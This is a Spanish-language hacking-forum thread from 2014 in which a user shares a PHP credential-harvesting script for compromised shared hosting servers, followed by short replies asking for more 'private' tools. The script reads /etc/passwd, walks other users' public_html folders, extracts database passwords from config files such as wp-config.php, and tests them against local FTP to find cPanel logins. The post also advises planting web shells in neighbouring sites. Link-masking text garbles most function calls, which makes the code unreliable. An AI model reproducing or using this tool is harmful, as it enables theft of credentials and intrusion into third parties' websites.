send
Grupo de Telegram
play_arrow
  3. Cpanel FtpHack and bypass directorios
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.
« anterior próximo »
Páginas: [1]   Ir Abajo

Cpanel FtpHack and bypass directorios

  • 5 Respuestas
  • 3191 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado josemi

  • *
  • Underc0der
  • Mensajes: 24
  • Actividad:
    0%
  • Reputación 0
  • Ing. Sistemas
    • Ver Perfil

Cpanel FtpHack and bypass directorios

« en: Julio 25, 2014, 10:15:20 am »
buenas, aquí le dejo esta herramienta muy util para sacar muchos hackedhost en mis tiempo era una tool private del foto  vip@r00t-y0u.org  :-[ a según ese foro lo defaceraon y por ahí subieron todas las tool private (googleen xD)

solo necesitas subirla algún hackedhost y ejecutarlo.. el sistema empezara a buscar las clave de cpanel del host ademas también publica directorio "bypasseable" es decir si en ese host hay varias pagina alojada te da el directorio de dicha web por ejemplo "home/$underc0de/public_html/" entonces por medio de shell entramos en ese directorio.. En caso que tengamos permisos de escritura podemos subir shell por ahí en caso que no entonces hay que revisar que cms usa editar el config.php y subir la shell


espero que aun funcione..  esta herramienta me fue muy útil  :'(

Código: PHP
  1. <?php
  2. echo "<html>";
  3. echo "<title>vip@r00t-y0u.org</title><body>";
  4.  
  5. You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login(0);
  6. ##################
  7. @$passwd=You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login('/etc/passwd','r');
  8. if (!$passwd) {
  9.    echo "[-] Error : coudn't read /etc/passwd";
  10.    You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login;
  11. }
  12. $path_to_public=You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login();
  13. $users=You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login();
  14. $pathtoconf=You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login();
  15. $i=0;
  16.  
  17. while(!You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($passwd)) {
  18.   $str=You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($passwd);
  19.   if ($i>35) {
  20.     $pos=You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($str,":");
  21.     $username=You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($str,0,$pos);
  22.     $dirz="/home/$username/public_html/";
  23.     if (($username!="")) {
  24.         if (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($dirz)) {
  25.             You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($users,$username);
  26.             You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($path_to_public,$dirz);
  27.         }
  28.     }
  29.   }
  30.   $i++;
  31. }
  32. ###################
  33.  
  34. #########################
  35. echo "<br><br>";
  36. echo "<textarea name='main_window' cols=100 rows=20>";
  37.  
  38. echo "[+] Founded ".You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($users)." entrys in /etc/passwd\n";
  39. echo "[+] Founded ".You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($path_to_public)." readable public_html directories\n";
  40.  
  41. echo "[~] Searching for passwords in config.* files...\n\n";
  42. foreach ($users as $user) {
  43.         $path="/home/$user/public_html/";
  44.         read_dir($path,$user);
  45. }
  46.  
  47. echo "\n[+] Done\n";
  48.  
  49. function read_dir($path,$username) {
  50.     if ($handle = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($path)) {
  51.         while (false !== ($file = You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($handle))) {
  52.               $fpath="$path$file";
  53.               if (($file!='.') and ($file!='..')) {
  54.                  if (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($fpath)) {
  55.                     $dr="$fpath/";
  56.                     if (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($dr)) {
  57.                        read_dir($dr,$username);
  58.                     }
  59.                     else {
  60.                          if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) {
  61.                             $pass=get_pass($fpath);
  62.                             if ($pass!='') {
  63.                                echo "[+] $fpath\n$pass\n";
  64.                                ftp_check($username,$pass);
  65.                             }
  66.                          }
  67.                     }
  68.                  }
  69.               }
  70.         }
  71.     }
  72. }
  73.  
  74. function get_pass($link) {
  75.     @$config=You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($link,'r');
  76.     while(!You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($config)) {
  77.         $line=You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($config);
  78.         if (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($line,'pass') or You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($line,'password') or You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($line,'passwd')) {
  79.             if (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($line,'"'))
  80.                $pass=You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($line,(You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($line,'=')+3),(You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($line,'"')-(You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($line,'=')+3)));
  81.             else
  82.                $pass=You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($line,(You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($line,'=')+3),(You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($line,"'")-(You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($line,'=')+3)));
  83.             return $pass;
  84.         }
  85.     }
  86. }
  87.  
  88. function ftp_check($login,$pass) {
  89.      @$ftp=You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login('127.0.0.1');
  90.      if ($ftp) {
  91.         @$res=You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($ftp,$login,$pass);
  92.         if ($res) {
  93.            echo '[Cpanel Found !!!] '.$login.':'.$pass."  Success\n";
  94.         }
  95.         else You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login($ftp);
  96.      }
  97. }
  98.  
  99. echo "</textarea><br>";
  100.  
  101. echo "</body></html>";
  102. ?>
En línea

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1883
  • Actividad:
    6.67%
  • Reputación 14
    • Ver Perfil
Re:Cpanel FtpHack and bypass directorios
« Respuesta #1 en: Julio 25, 2014, 10:24:19 am »
Gracias por el aporte josemi, no conocia esta tool y parece muy buena. He buscado y no he encontrado el resto de las tools, si las tienes o sabes donde conseguirlas dimelo vía mp :)

Un saludo.
En línea


Desconectado josemi

  • *
  • Underc0der
  • Mensajes: 24
  • Actividad:
    0%
  • Reputación 0
  • Ing. Sistemas
    • Ver Perfil
Re:Cpanel FtpHack and bypass directorios
« Respuesta #2 en: Julio 25, 2014, 11:49:18 am »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Gracias por el aporte josemi, no conocia esta tool y parece muy buena. He buscado y no he encontrado el resto de las tools, si las tienes o sabes donde conseguirlas dimelo vía mp :)

Un saludo.


yo creo que la debo tener por ahí guardada .. tengo que buscarla tengo como 5 años si revisar mi disco duro portátil y no recuerdo donde guardaba eso, también tengo la tool priv8 del doom team aunque esa si ya están obsoletas xD
En línea

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1883
  • Actividad:
    6.67%
  • Reputación 14
    • Ver Perfil
Re:Cpanel FtpHack and bypass directorios
« Respuesta #3 en: Julio 25, 2014, 12:04:21 pm »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Gracias por el aporte josemi, no conocia esta tool y parece muy buena. He buscado y no he encontrado el resto de las tools, si las tienes o sabes donde conseguirlas dimelo vía mp :)

Un saludo.


yo creo que la debo tener por ahí guardada .. tengo que buscarla tengo como 5 años si revisar mi disco duro portátil y no recuerdo donde guardaba eso, también tengo la tool priv8 del doom team aunque esa si ya están obsoletas xD

Si las encuentras, pasamelas por favor

Un saludo :D
En línea


Desconectado hielasangre

  • *
  • Underc0der
  • Mensajes: 118
  • Actividad:
    5%
  • Reputación 0
    • Ver Perfil
Re:Cpanel FtpHack and bypass directorios
« Respuesta #4 en: Julio 25, 2014, 12:06:47 pm »
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Gracias por el aporte josemi, no conocia esta tool y parece muy buena. He buscado y no he encontrado el resto de las tools, si las tienes o sabes donde conseguirlas dimelo vía mp :)

Un saludo.


yo creo que la debo tener por ahí guardada .. tengo que buscarla tengo como 5 años si revisar mi disco duro portátil y no recuerdo donde guardaba eso, también tengo la tool priv8 del doom team aunque esa si ya están obsoletas xD

Es DOM team, y esta tool que yo sepa es publica desde el año 2006 masomenos xD
En línea

Desconectado josemi

  • *
  • Underc0der
  • Mensajes: 24
  • Actividad:
    0%
  • Reputación 0
  • Ing. Sistemas
    • Ver Perfil
Re:Cpanel FtpHack and bypass directorios
« Respuesta #5 en: Julio 25, 2014, 12:09:29 pm »
jajaja si DOM TEAM  :-[ , ah bueno hubo unas publica y otra privada de todas forma ya es material obsoleto , jaja ya me siento viejo 2006  ::)
En línea
Páginas: [1]   Ir Arriba
« anterior próximo »
 

¿Te gustó el post? COMPARTILO!



[Symlink] + Bypass AdminPanel Joomla + Exploit 0day Java7

Iniciado por CalebBucker

 Respuestas: 1
Vistas: 1679 		Último mensaje Septiembre 06, 2012, 03:26:16 pm
por hdbreaker
Tutorial de un exploit local BOF con bypass DEP usando ROP by PerverthsO

Iniciado por PerverthsO

 Respuestas: 0
Vistas: 1398 		Último mensaje Marzo 04, 2013, 01:40:08 pm
por PerverthsO
Demostración Symlink [Video] + Explicación bypass info

Iniciado por andrewtwo

 Respuestas: 1
Vistas: 1864 		Último mensaje Agosto 30, 2012, 01:18:16 pm
por hdbreaker
Desbordando el buffer en linux x86 (III) [ASLR bypass]

Iniciado por q3rv0

 Respuestas: 1
Vistas: 2311 		Último mensaje Junio 23, 2015, 11:59:00 am
por roadd
Codeando un exploit II: Bypass uploaders & RCE

Iniciado por dracko.rx

 Respuestas: 0
Vistas: 1630 		Último mensaje Febrero 24, 2010, 03:28:59 pm
por dracko.rx